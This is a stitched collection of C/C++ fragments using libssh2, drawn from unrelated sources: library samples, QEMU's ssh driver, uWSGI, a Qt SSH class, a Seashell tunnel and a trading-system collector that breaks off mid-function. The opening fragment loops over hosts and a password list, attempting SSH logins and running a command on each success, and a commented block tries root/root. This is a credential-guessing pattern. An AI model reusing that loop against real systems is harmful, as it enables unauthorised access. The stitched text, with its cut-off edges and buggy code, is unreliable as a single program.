sexec.SetTimeout(17); if (ret_code) throw("\r\nfailed: SetTimeout\r\n"); ret_code = sexec.SetSSHUser(username); if (ret_code) throw("\r\nfailed: SetSSHUser\r\n"); ret_code = sexec.SetSSHPassword(passwords[u]); if (ret_code) throw("\r\nfailed: SetSSHPassword()\r\n"); ret_code = sexec.SSHLogon(curhost ,22); if (ret_code) throw("\r\nfailed: SSHLogon\r\n"); ret_code = sexec.Execute("ls -l"); if (ret_code) throw("\r\Execute:%d",ret_code); //sleep(2); deb(KGRN "executed on %s\r\n" RESET, curhost); // fdeb("\r\n[host %s]\r\n",curhost); // exit(0); } catch ( const char *str ) { deb(KRED "in except: %s\r\n" RESET,str); } //exit(0); } } // free(fingerprint); } if (channel) libssh2_channel_free(channel); if (session) { // libssh2_session_disconnect(session, "Norm"); libssh2_session_free(session); } /* ssh = CkSsh_Create(); bool success; CkSsh_UnlockComponent(ssh,"Anything for 30-day trial"); success = CkSsh_Connect(ssh,inet_ntoa(serv_addr.sin_addr),22); CkSsh_putIdleTimeoutMs(ssh,5000); success = CkSsh_AuthenticatePw(ssh,"root","root"); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } int channelNum; channelNum = CkSsh_OpenSessionChannel(ssh); if (channelNum < 0) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } success = CkSsh_SendReqExec(ssh,channelNum,"uname -a"); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Call ChannelReceiveToClose to read // output until the server's corresponding "channel close" is received. success = CkSsh_ChannelReceiveToClose(ssh,channelNum); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Let's pickup the accumulated output of the command: const char * cmdOutput; cmdOutput = CkSsh_getReceivedText(ssh,channelNum,"ansi"); if (cmdOutput == 0 ) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Display the remote shell's command output: deb("%s\n",cmdOutput); // Disconnect CkSsh_Disconnect(ssh); CkSsh_Dispose(ssh);*/ } }
int main(int argc, char *argv[]) { unsigned long hostaddr; int sock, i, auth_pw = 1; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session = NULL; LIBSSH2_CHANNEL *channel; const char *username="******"; const char *password="******"; const char *loclfile="scp_write.c"; const char *scppath="/tmp/TEST"; FILE *local; int rc; char mem[1024]; size_t nread; char *ptr; struct stat fileinfo; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(2,0), &wsadata); #endif if (argc > 1) { hostaddr = inet_addr(argv[1]); } else { hostaddr = htonl(0x7F000001); } if (argc > 2) { username = argv[2]; } if (argc > 3) { password = argv[3]; } if(argc > 4) { loclfile = argv[4]; } if (argc > 5) { scppath = argv[5]; } rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } local = fopen(loclfile, "rb"); if (!local) { fprintf(stderr, "Can't open local file %s\n", loclfile); return -1; } stat(loclfile, &fileinfo); /* Ultra basic "connect to port 22 on localhost" * Your code is responsible for creating the socket establishing the * connection */ sock = socket(AF_INET, SOCK_STREAM, 0); if(-1 == sock) { fprintf(stderr, "failed to create socket!\n"); return -1; } sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = hostaddr; if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); return -1; } /* Create a session instance */ session = libssh2_session_init(); if(!session) return -1; /* ... start it up. This will trade welcome banners, exchange keys, * and setup crypto, compression, and MAC layers */ rc = libssh2_session_handshake(session, sock); if(rc) { fprintf(stderr, "Failure establishing SSH session: %d\n", rc); return -1; } /* At this point we havn't yet authenticated. The first thing to do * is check the hostkey's fingerprint against our known hosts Your app * may have it hard coded, may go to a file, may present it to the * user, that's your call */ fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); fprintf(stderr, "Fingerprint: "); for(i = 0; i < 20; i++) { fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]); } fprintf(stderr, "\n"); if (auth_pw) { /* We could authenticate via password */ if (libssh2_userauth_password(session, username, password)) { fprintf(stderr, "Authentication by password failed.\n"); goto shutdown; } } else { /* Or by public key */ if (libssh2_userauth_publickey_fromfile(session, username, "/home/username/.ssh/id_rsa.pub", "/home/username/.ssh/id_rsa", password)) { fprintf(stderr, "\tAuthentication by public key failed\n"); goto shutdown; } } /* Send a file via scp. The mode parameter must only have permissions! */ channel = libssh2_scp_send(session, scppath, fileinfo.st_mode & 0777, (unsigned long)fileinfo.st_size); if (!channel) { char *errmsg; int errlen; int err = libssh2_session_last_error(session, &errmsg, &errlen, 0); fprintf(stderr, "Unable to open a session: (%d) %s\n", err, errmsg); goto shutdown; } fprintf(stderr, "SCP session waiting to send file\n"); do { nread = fread(mem, 1, sizeof(mem), local); if (nread <= 0) { /* end of file */ break; } ptr = mem; do { /* write the same data over and over, until error or completion */ rc = libssh2_channel_write(channel, ptr, nread); if (rc < 0) { fprintf(stderr, "ERROR %d\n", rc); break; } else { /* rc indicates how many bytes were written this time */ ptr += rc; nread -= rc; } } while (nread); } while (1); fprintf(stderr, "Sending EOF\n"); libssh2_channel_send_eof(channel); fprintf(stderr, "Waiting for EOF\n"); libssh2_channel_wait_eof(channel); fprintf(stderr, "Waiting for channel to close\n"); libssh2_channel_wait_closed(channel); libssh2_channel_free(channel); channel = NULL; shutdown: if(session) { libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); } #ifdef WIN32 closesocket(sock); #else close(sock); #endif if (local) fclose(local); fprintf(stderr, "all done\n"); libssh2_exit(); return 0; }
int main(int argc, char *argv[]) { unsigned long hostaddr; int rc, sock, i, auth_pw = 0; struct sockaddr_in sin; const char *fingerprint; char *userauthlist; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; #ifdef WIN32 WSADATA wsadata; int err; err = WSAStartup(MAKEWORD(2,0), &wsadata); if (err != 0) { fprintf(stderr, "WSAStartup failed with error: %d\n", err); return 1; } #endif if (argc > 1) { hostaddr = inet_addr(argv[1]); } else { hostaddr = htonl(0x7F000001); } if(argc > 2) { username = argv[2]; } if(argc > 3) { password = argv[3]; } rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } /* Ultra basic "connect to port 22 on localhost". Your code is * responsible for creating the socket establishing the connection */ sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = hostaddr; if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); return -1; } /* Create a session instance and start it up. This will trade welcome * banners, exchange keys, and setup crypto, compression, and MAC layers */ session = libssh2_session_init(); if (libssh2_session_handshake(session, sock)) { fprintf(stderr, "Failure establishing SSH session\n"); return -1; } /* At this point we havn't authenticated. The first thing to do is check * the hostkey's fingerprint against our known hosts Your app may have it * hard coded, may go to a file, may present it to the user, that's your * call */ fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); fprintf(stderr, "Fingerprint: "); for(i = 0; i < 20; i++) { fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]); } fprintf(stderr, "\n"); /* check what authentication methods are available */ userauthlist = libssh2_userauth_list(session, username, strlen(username)); fprintf(stderr, "Authentication methods: %s\n", userauthlist); if (strstr(userauthlist, "password") != NULL) { auth_pw |= 1; } if (strstr(userauthlist, "keyboard-interactive") != NULL) { auth_pw |= 2; } if (strstr(userauthlist, "publickey") != NULL) { auth_pw |= 4; } /* if we got an 4. argument we set this option if supported */ if(argc > 4) { if ((auth_pw & 1) && !strcasecmp(argv[4], "-p")) { auth_pw = 1; } if ((auth_pw & 2) && !strcasecmp(argv[4], "-i")) { auth_pw = 2; } if ((auth_pw & 4) && !strcasecmp(argv[4], "-k")) { auth_pw = 4; } } if (auth_pw & 1) { /* We could authenticate via password */ if (libssh2_userauth_password(session, username, password)) { fprintf(stderr, "\tAuthentication by password failed!\n"); goto shutdown; } else { fprintf(stderr, "\tAuthentication by password succeeded.\n"); } } else if (auth_pw & 2) { /* Or via keyboard-interactive */ if (libssh2_userauth_keyboard_interactive(session, username, &kbd_callback) ) { fprintf(stderr, "\tAuthentication by keyboard-interactive failed!\n"); goto shutdown; } else { fprintf(stderr, "\tAuthentication by keyboard-interactive succeeded.\n"); } } else if (auth_pw & 4) { /* Or by public key */ if (libssh2_userauth_publickey_fromfile(session, username, keyfile1, keyfile2, password)) { fprintf(stderr, "\tAuthentication by public key failed!\n"); goto shutdown; } else { fprintf(stderr, "\tAuthentication by public key succeeded.\n"); } } else { fprintf(stderr, "No supported authentication methods found!\n"); goto shutdown; } /* Request a shell */ if (!(channel = libssh2_channel_open_session(session))) { fprintf(stderr, "Unable to open a session\n"); goto shutdown; } /* Some environment variables may be set, * It's up to the server which ones it'll allow though */ libssh2_channel_setenv(channel, "FOO", "bar"); /* Request a terminal with 'vanilla' terminal emulation * See /etc/termcap for more options */ if (libssh2_channel_request_pty(channel, "vanilla")) { fprintf(stderr, "Failed requesting pty\n"); goto skip_shell; } /* Open a SHELL on that pty */ if (libssh2_channel_shell(channel)) { fprintf(stderr, "Unable to request shell on allocated pty\n"); goto shutdown; } /* At this point the shell can be interacted with using * libssh2_channel_read() * libssh2_channel_read_stderr() * libssh2_channel_write() * libssh2_channel_write_stderr() * * Blocking mode may be (en|dis)abled with: libssh2_channel_set_blocking() * If the server send EOF, libssh2_channel_eof() will return non-0 * To send EOF to the server use: libssh2_channel_send_eof() * A channel can be closed with: libssh2_channel_close() * A channel can be freed with: libssh2_channel_free() */ skip_shell: if (channel) { libssh2_channel_free(channel); channel = NULL; } /* Other channel types are supported via: * libssh2_scp_send() * libssh2_scp_recv() * libssh2_channel_direct_tcpip() */ shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif fprintf(stderr, "all done!\n"); libssh2_exit(); return 0; }
static int connect_to_ssh(BDRVSSHState *s, QDict *options, int ssh_flags, int creat_mode, Error **errp) { int r, ret; QemuOpts *opts = NULL; Error *local_err = NULL; const char *user, *path, *host_key_check; long port = 0; opts = qemu_opts_create(&ssh_runtime_opts, NULL, 0, &error_abort); qemu_opts_absorb_qdict(opts, options, &local_err); if (local_err) { ret = -EINVAL; error_propagate(errp, local_err); goto err; } if (!ssh_process_legacy_socket_options(options, opts, errp)) { ret = -EINVAL; goto err; } path = qemu_opt_get(opts, "path"); if (!path) { ret = -EINVAL; error_setg(errp, "No path was specified"); goto err; } user = qemu_opt_get(opts, "user"); if (!user) { user = g_get_user_name(); if (!user) { error_setg_errno(errp, errno, "Can't get user name"); ret = -errno; goto err; } } host_key_check = qemu_opt_get(opts, "host_key_check"); if (!host_key_check) { host_key_check = "yes"; } /* Pop the config into our state object, Exit if invalid */ s->inet = ssh_config(s, options, errp); if (!s->inet) { ret = -EINVAL; goto err; } if (qemu_strtol(s->inet->port, NULL, 10, &port) < 0) { error_setg(errp, "Use only numeric port value"); ret = -EINVAL; goto err; } /* Open the socket and connect. */ s->sock = inet_connect_saddr(s->inet, errp, NULL, NULL); if (s->sock < 0) { ret = -EIO; goto err; } /* Create SSH session. */ s->session = libssh2_session_init(); if (!s->session) { ret = -EINVAL; session_error_setg(errp, s, "failed to initialize libssh2 session"); goto err; } #if TRACE_LIBSSH2 != 0 libssh2_trace(s->session, TRACE_LIBSSH2); #endif r = libssh2_session_handshake(s->session, s->sock); if (r != 0) { ret = -EINVAL; session_error_setg(errp, s, "failed to establish SSH session"); goto err; } /* Check the remote host's key against known_hosts. */ ret = check_host_key(s, s->inet->host, port, host_key_check, errp); if (ret < 0) { goto err; } /* Authenticate. */ ret = authenticate(s, user, errp); if (ret < 0) { goto err; } /* Start SFTP. */ s->sftp = libssh2_sftp_init(s->session); if (!s->sftp) { session_error_setg(errp, s, "failed to initialize sftp handle"); ret = -EINVAL; goto err; } /* Open the remote file. */ DPRINTF("opening file %s flags=0x%x creat_mode=0%o", path, ssh_flags, creat_mode); s->sftp_handle = libssh2_sftp_open(s->sftp, path, ssh_flags, creat_mode); if (!s->sftp_handle) { session_error_setg(errp, s, "failed to open remote file '%s'", path); ret = -EINVAL; goto err; } qemu_opts_del(opts); r = libssh2_sftp_fstat(s->sftp_handle, &s->attrs); if (r < 0) { sftp_error_setg(errp, s, "failed to read file attributes"); return -EINVAL; } return 0; err: if (s->sftp_handle) { libssh2_sftp_close(s->sftp_handle); } s->sftp_handle = NULL; if (s->sftp) { libssh2_sftp_shutdown(s->sftp); } s->sftp = NULL; if (s->session) { libssh2_session_disconnect(s->session, "from qemu ssh client: " "error opening connection"); libssh2_session_free(s->session); } s->session = NULL; qemu_opts_del(opts); return ret; }
static int uwsgi_init_ssh_session( struct uwsgi_ssh_mountpoint *usm, int* socket_fd, LIBSSH2_SESSION **session) { int sock = uwsgi_connect(usm->remote, ulibssh2.ssh_timeout, 1); if (sock < 0) { uwsgi_error("uwsgi_init_ssh_session()/uwsgi_connect()"); return 1; } int rc = libssh2_init(0); if (rc) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_init()"); goto shutdown; } *session = libssh2_session_init(); if (!session) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_session_init()"); goto shutdown; } libssh2_session_set_blocking(*session, 0); while ((rc = libssh2_session_handshake(*session, sock)) == LIBSSH2_ERROR_EAGAIN) { uwsgi_ssh_waitsocket(sock, *session); } if (rc) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_session_handshake()"); goto shutdown; } if (!ulibssh2.disable_remote_fingerprint_check) { LIBSSH2_KNOWNHOSTS *nh = libssh2_knownhost_init(*session); if (!nh) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_knownhost_init()"); goto shutdown; } if (libssh2_knownhost_readfile(nh, ulibssh2.known_hosts_path, LIBSSH2_KNOWNHOST_FILE_OPENSSH) < 0) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_knownhost_readfile()"); } size_t len; int type; const char *fingerprint = libssh2_session_hostkey(*session, &len, &type); if (!fingerprint) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_session_hostkey()"); libssh2_knownhost_free(nh); goto shutdown; } char *remoteaddr_str = uwsgi_str(usm->remote); char *port_str = strchr(remoteaddr_str, ':'); int port = SSH_DEFAULT_PORT; if (port_str) { port_str[0] = 0; port_str++; port = atoi(port_str); } struct libssh2_knownhost *host; int check = libssh2_knownhost_checkp( nh, remoteaddr_str, port, fingerprint, len, LIBSSH2_KNOWNHOST_TYPE_PLAIN|LIBSSH2_KNOWNHOST_KEYENC_RAW, &host ); free(remoteaddr_str); if (check != LIBSSH2_KNOWNHOST_CHECK_MATCH) { uwsgi_log("[SSH] Remote fingerprint check failed!\n"); libssh2_knownhost_free(nh); goto shutdown; } libssh2_knownhost_free(nh); } // If specified, username and password are honored if (usm->username && usm->password) { while ((rc = libssh2_userauth_password( *session, usm->username, usm->password) ) == LIBSSH2_ERROR_EAGAIN) { uwsgi_ssh_waitsocket(sock, *session); } if (rc) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_userauth_password()"); goto shutdown; } else { goto end; } // Else, let's try the fallback authentication methods: } else if (usm->username || ulibssh2.username) { // Let's choose which username to use char* auth_user = ulibssh2.username; if (usm->username) { auth_user = usm->username; } // Password authentication if (ulibssh2.auth_pw && ulibssh2.password) { while ((rc = libssh2_userauth_password( *session, auth_user, ulibssh2.password) ) == LIBSSH2_ERROR_EAGAIN) { uwsgi_ssh_waitsocket(sock, *session); } if (rc) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_userauth_password()"); // goto shutdown; } else { goto end; } } // SSH agent authentication if (usm->ssh_agent || ulibssh2.auth_ssh_agent) { if (uwsgi_ssh_agent_auth(*session, sock, auth_user)) { uwsgi_error("uwsgi_init_ssh_session()/uwsgi_ssh_agent_auth()"); // goto shutdown; } else { goto end; } } // Public key authentication if ((ulibssh2.private_key_path && ulibssh2.private_key_passphrase) || (usm->priv_key_path && usm->priv_key_passphrase)) { char *actual_pubk_path = ulibssh2.public_key_path; if (usm->pub_key_path) { actual_pubk_path = usm->pub_key_path; } char *actual_privk_path = ulibssh2.private_key_path; if (usm->priv_key_path) { actual_privk_path = usm->priv_key_path; } char *actual_passphrase = ulibssh2.private_key_passphrase; if (usm->priv_key_passphrase) { actual_passphrase = usm->priv_key_passphrase; } while ((rc = libssh2_userauth_publickey_fromfile( *session, auth_user, actual_pubk_path, actual_privk_path, actual_passphrase) ) == LIBSSH2_ERROR_EAGAIN) { uwsgi_ssh_waitsocket(sock, *session); } if (rc == LIBSSH2_ERROR_PUBLICKEY_UNVERIFIED) { uwsgi_log("[SSH] ssh authentication failed (bad passphrase)\n"); // goto shutdown; } else if (rc) { uwsgi_error("uwsgi_init_ssh_session()/libssh2_userauth_publickey_fromfile()"); // goto shutdown; } else { goto end; } } } // If we arrive here, something went wrong. uwsgi_log("[SSH] session initialization failed (no authentication method worked)\n"); shutdown: close(sock); return 1; end: // Otherwise, we're fine! *socket_fd = sock; return 0; }
void SshConnection::openSocket(unsigned const timeout) { // Create the socket m_socket = socket(AF_INET, SOCK_STREAM, 0); if (m_socket < 0) throw Exception("Failed to create socket"); setNonBlocking(); // Now try and connect with timout struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = htons(m_port); sin.sin_addr.s_addr = HostLookup(m_hostname); int rc(::connect(m_socket, (struct sockaddr*)&sin, sizeof(struct sockaddr_in))); #ifdef WIN32 if (rc == SOCKET_ERROR) rc = -1; int ok(WSAEWOULDBLOCK); #else int ok(EINPROGRESS); #endif if (rc < 0) { if (errno != ok) { QString msg("Connection failed: "); throw Exception(msg + lastError()); } do { struct timeval tv; tv.tv_sec = timeout / 1000; tv.tv_usec = 1000*(timeout % 1000); fd_set myset; FD_ZERO(&myset); FD_SET(m_socket, &myset); rc = select(m_socket+1, NULL, &myset, NULL, &tv); if (rc == 0) { throw NetworkTimeout(); }else if (rc < 0 && errno != EINTR) { QString msg("Connection failed: "); throw Exception(msg + lastError()); }else if (rc > 0) { // Socket selected for write socklen_t lon(sizeof(int)); int errorStatus; #ifdef WIN32 if (getsockopt(m_socket, SOL_SOCKET, SO_ERROR, (char*)(&errorStatus), &lon) < 0) { #else if (getsockopt(m_socket, SOL_SOCKET, SO_ERROR, (void*)(&errorStatus), &lon) < 0) { #endif QString msg("Error check on socket: "); throw Exception(msg + lastError()); } // Check the value returned... if (errorStatus) { QString msg("Connection failed "); msg += QString::number(errorStatus) + ": "; throw Exception(msg + lastError()); } break; } } while (1); } setBlocking(); } // Returns true if the username and password are valid, false otherwise. // throws on any other error. void SshConnection::authenticate(AuthenticationT const authentication, QString& username) { m_username = username; if (m_socket <= 0) throw Exception("Authentication on invalid socket"); // Create a session instance m_session = libssh2_session_init(); if (!m_session) throw Exception("Failed to initialize SSH session"); // This trades welcome banners, exchange keys, // and sets up crypto, compression, and MAC layers int rc(0); while ((rc = libssh2_session_handshake(m_session, m_socket)) == LIBSSH2_ERROR_EAGAIN); if (rc) { QString msg("Failed to establish a valid SSH session ("); msg += QString::number(rc) + "): "; throw Exception(msg + lastSessionError()); } /* Can't get this working at the moment const char* fingerprint(libssh2_hostkey_hash(m_session, LIBSSH2_HOSTKEY_HASH_MD5)); fprintf(stderr, "SSH Fingerprint: "); for (int i = 0; i < 20; ++i) { fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]); } fprintf(stderr, "\n"); */ //!!! // Check what authentication methods are available char* authenticationMethods = libssh2_userauth_list(m_session, username.toLatin1().data(), username.length()); //publickey,gssapi-with-mic,password,hostbased //publickey,keyboard-interactive rc = LIBSSH2_ERROR_METHOD_NOT_SUPPORTED; switch (authentication) { case None: break; case Agent: rc = connectAgent(); break; case HostBased: if (strstr(authenticationMethods, "hostbased") != NULL) { rc = connectHostBased(); } break; case KeyboardInteractive: if (strstr(authenticationMethods, "keyboard-interactive") != NULL) { rc = connectKeyboardInteractive(); } break; case Password: if (strstr(authenticationMethods, "password") != NULL) { rc = connectPassword(); } break; case PublicKey: if (strstr(authenticationMethods, "publickey") != NULL) { rc = connectPublicKey(); } break; } QString msg; switch (rc) { case LIBSSH2_ERROR_NONE: m_status = Connection::Authenticated; QLOG_INFO() << "SSH Connection established"; break; case LIBSSH2_ERROR_PUBLICKEY_NOT_FOUND: msg = "Public key not found for host " + m_hostname; throw Exception(msg); break; case LIBSSH2_ERROR_AUTHENTICATION_FAILED: throw AuthenticationError(); break; case LIBSSH2_ERROR_METHOD_NOT_SUPPORTED: msg = toString(authentication) + " authentication not supported\n\n"; msg += "Supported methods: "; msg += QString(authenticationMethods).replace(",",", "); throw Exception(msg); break; case LIBSSH2_ERROR_AUTHENTICATION_CANCELLED: throw AuthenticationCancelled(); break; default: QString msg("Authentication failed:\n"); msg += lastSessionError(); throw Exception(msg); break; } }
/** * seashell_tunnel_connect_password (const char* host, const char* user, const char* password, int* error) * Connects to the host via SSH on port 22, and launches a Seashell backend instance for that user * on the host. * * Consults /etc/seashell_hosts for host's SSH public keys. If this file does not exist, * this function will fail for security reasons. /etc/seashell_hosts is a standard * OpenSSH known_hosts file. * * Arguments: * host - Host to connect to. * user - User to run as. * password - User's password. * error - [optional] denotes error on failure. * remote_addr - Address to which the remote IP address will * be written. Reserve 128 bytes. * family - Address family. * target - Target to execute. * * Returns: * Handle to connection object on success, NULL otherwise. * If error is NOT null, error will hold more detailed error information. */ struct seashell_connection* seashell_tunnel_connect_password (const char* host, const char* user, const char* password, int* error, char * remote_addr, int* family, char* target) { struct addrinfo hints; struct addrinfo *results, *rp; int sockfd; int i, e; struct seashell_connection* result = NULL; /* Resolve the host's address. * See getaddrinfo(3) for how this works. */ memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_flags = 0; hints.ai_protocol = 0; e = getaddrinfo(host, "22", &hints, &results); if (e != 0) { SET_ERROR(TUNNEL_ERROR_RESOLV); return NULL; } for (rp = results; rp != NULL; rp = rp->ai_next) { sockfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol); if (sockfd == -1) continue; if (connect(sockfd, rp->ai_addr, rp->ai_addrlen) != -1) break; close(sockfd); } /* Write address that we're connecting to into * remote_addr. */ if(rp != NULL) { *family = rp->ai_family; switch(rp->ai_family) { case AF_INET: if(inet_ntop(rp->ai_family, &((struct sockaddr_in *)rp->ai_addr)->sin_addr, remote_addr, 128) == NULL) { SET_ERROR(TUNNEL_ERROR_RESOLV); return NULL; } break; case AF_INET6: if(inet_ntop(rp->ai_family, &((struct sockaddr_in6 *)rp->ai_addr)->sin6_addr, remote_addr, 128) == NULL) { SET_ERROR(TUNNEL_ERROR_RESOLV); return NULL; } break; default: SET_ERROR(TUNNEL_ERROR_RESOLV); return NULL; } } freeaddrinfo(results); /* Either rp == NULL, in which case we failed at connecting, * or sockfd holds our socket. */ if (rp == NULL) { SET_ERROR(TUNNEL_ERROR_CONNECT); return NULL; } /** Set up the session */ LIBSSH2_SESSION* session; LIBSSH2_CHANNEL* channel; LIBSSH2_KNOWNHOSTS* hosts; size_t len; int type; session = libssh2_session_init(); if (!session) { SET_ERROR(TUNNEL_ERROR_SESSION_START); goto session_teardown; } e = libssh2_session_handshake(session, sockfd); if (e) { SET_ERROR(TUNNEL_ERROR_SESSION_HANDSHAKE); goto session_teardown; } hosts = libssh2_knownhost_init(session); if (!hosts) { SET_ERROR(TUNNEL_ERROR_HOSTS_FILE); goto session_teardown; } if (!IS_INSTALLED() && access(DEBUG_HOSTS_FILE, F_OK) != -1) { libssh2_knownhost_readfile(hosts, DEBUG_HOSTS_FILE, LIBSSH2_KNOWNHOST_FILE_OPENSSH); } else { libssh2_knownhost_readfile(hosts, HOSTS_FILE, LIBSSH2_KNOWNHOST_FILE_OPENSSH); } const char* fingerprint = libssh2_session_hostkey(session, &len, &type); if (!fingerprint || type == LIBSSH2_HOSTKEY_TYPE_UNKNOWN) { libssh2_knownhost_free(hosts); SET_ERROR(TUNNEL_ERROR_HOST); goto session_teardown; } struct libssh2_knownhost *hostkey; /** NOTE: Documentation is buggy. hostkey MUST be passed. */ int check = libssh2_knownhost_check(hosts, host, fingerprint, len, LIBSSH2_KNOWNHOST_TYPE_PLAIN | LIBSSH2_KNOWNHOST_KEYENC_RAW, &hostkey); if (check != LIBSSH2_KNOWNHOST_CHECK_MATCH) { int keytype = 0; switch (type) { case LIBSSH2_HOSTKEY_TYPE_RSA: keytype = LIBSSH2_KNOWNHOST_KEY_SSHRSA; break; case LIBSSH2_HOSTKEY_TYPE_DSS: keytype = LIBSSH2_KNOWNHOST_KEY_SSHRSA; break; } if (keytype) { libssh2_knownhost_addc(hosts, host, NULL, fingerprint, len, "Generated from Seashell Tunnel", strlen("Generated from Seashell Tunnel"), LIBSSH2_KNOWNHOST_TYPE_PLAIN | LIBSSH2_KNOWNHOST_KEYENC_RAW | (type == LIBSSH2_HOSTKEY_TYPE_RSA ? LIBSSH2_KNOWNHOST_KEY_SSHRSA : LIBSSH2_KNOWNHOST_KEY_SSHDSS), NULL); libssh2_knownhost_writefile(hosts, DUMP_FILE, LIBSSH2_KNOWNHOST_FILE_OPENSSH); fprintf(stderr, "%s: Check SSH key for %s! Keys written to %s\n", user, host, DUMP_FILE); } else { fprintf(stderr, "%s: Check SSH key for %s!\n", user, host, DUMP_FILE); fprintf(stderr, "%s: Keys not written to file - contact Seashell Maintainers to add support for the LibSSH2 key format %d\n", user, type); } libssh2_knownhost_free(hosts); SET_ERROR(TUNNEL_ERROR_HOST); goto session_teardown; } libssh2_knownhost_free(hosts); FPRINTF_IF_DEBUG(stderr, "%s: Host check passed for %s (fingerprint type %d) - ", user, host, type); for(i = 0; i < 20; i++) { FPRINTF_IF_DEBUG(stderr, "%02X ", (unsigned char)fingerprint[i]); } FPRINTF_IF_DEBUG(stderr, "\n"); e = libssh2_userauth_password(session, user, password); if (e) { FPRINTF_IF_DEBUG(stderr, "%s: Error authenticating: %d\n", user, e); SET_ERROR(TUNNEL_ERROR_CREDS); goto session_teardown; } channel = libssh2_channel_open_session(session); if (!channel) { SET_ERROR(TUNNEL_ERROR_CHANNEL_OPEN); goto session_teardown; } /** * Ideally we'd have a subsystem configured, * as I don't see a good way of pulling out of ssh2 * if the target does not exist. */ e = libssh2_channel_exec(channel, target); if (e) { SET_ERROR(TUNNEL_ERROR_LAUNCH_SEASHELL); goto channel_teardown; } result = malloc(sizeof(struct seashell_connection)); if (!result) { SET_ERROR(TUNNEL_ERROR_SESSION_START); goto channel_teardown; } result->sockfd = sockfd; result->session = session; result->channel = channel; goto end; channel_teardown: libssh2_channel_free(channel); session_teardown: libssh2_session_free(session); close(sockfd); end: return result; }
bool StartLineProcessCollector::collect(MONITORING::leaseProcessStart *sample, StartLineProcessConnector *conn) { if (NULL == sample) { g_cSystemLogger.LogMessage("(%s:%s:%d):: sample is NULL \n \n ", LOG_LOCATION); return false; } int i=0; ItrServerDetails serIter; lineDetails ld; g_cSystemLogger.LogMessage("(%s:%s:%d)::cancelid %d \n ", LOG_LOCATION,sample->ip_info[i].CancelOrderId); if(sample->ip_info[i].CancelOrderId!=0) { char buf[50]={0}; char recvbuf[512]={0}; int recvLen; g_cSystemLogger.LogMessage("(%s:%s:%d):: size of order vector %d \n ",LOG_LOCATION,conn->orderIds.size()); for(i=0;i<conn->orderIds.size();i++) { //g_cSystemLogger.LogMessage("(%s:%s(:%d)::Inside CancelOrder %d \n", LOG_LOCATION,sample->ip_info[i].CancelOrderId); int pos; int j; pos+=sprintf(buf+5,"%s%d%s","#",conn->orderIds[i],"#"); g_cSystemLogger.LogMessage("(%s:%s(:%d)::order length %d buf %s \n", LOG_LOCATION,pos,buf); char c='0'; for(j=0;j<=3;j++) { buf[j]=c; //g_cSystemLogger.LogMessage("(%s:%s(:%d)::Inside CancelOrder buf %c \n", LOG_LOCATION,buf[j]); } char p=(char)(((int)'0')+pos); buf[j]=p; g_cSystemLogger.LogMessage("(%s:%s(:%d)::Inside CancelOrder buf %s socketId %d \n", LOG_LOCATION,buf,CControllerThread::getInstance()->socketId); if(recvLen==write(CControllerThread::getInstance()->socketId,buf,sizeof(buf))) { g_cSystemLogger.LogMessage("(%s:%s(:%d)::writeLen %d \n", LOG_LOCATION,recvLen); //CControllerThread::getInstance()->makeSocketConnection(); } g_cSystemLogger.LogMessage("(%s:%s(:%d)::write sucessfull writeLen %d \n", LOG_LOCATION,recvLen); if(recvLen=recv(CControllerThread::getInstance()->socketId,recvbuf,sizeof(recvbuf),0)<0) { g_cSystemLogger.LogMessage("(%s:%s(:%d)::Recv Error \n", LOG_LOCATION); } g_cSystemLogger.LogMessage("(%s:%s(:%d)::RecvLen %d recvbuf %s \n", LOG_LOCATION,recvLen,recvbuf); strncpy(ld.CancelOrderStatus,recvbuf,sizeof(recvbuf)); CcopyStructure::copyCommandData(ld, ld.line_count); memset(buf,0,sizeof(buf)); pos=0; sleep(1); } return true; } else { for(i=0;i<sample->ip_info.length();i++) { if(strcmp(sample->ip_info[i].ipadress,"")==0) break; LIBSSH2_CHANNEL *channel2; LIBSSH2_SESSION *session; char* userName; char* passWord; struct sockaddr_in sin; int rc, sock, auth_pw = 0; char *exitsignal = (char *) "none"; size_t lnReturnCode; char command[12324] = {0}; char processes[8024] = {0}; char *lpUserAuthList; g_cSystemLogger.LogMessage("(%s:%s:%d):: Debug", LOG_LOCATION); rc = libssh2_init(0); strcpy(ld.ipadress,sample->ip_info[i].ipadress); 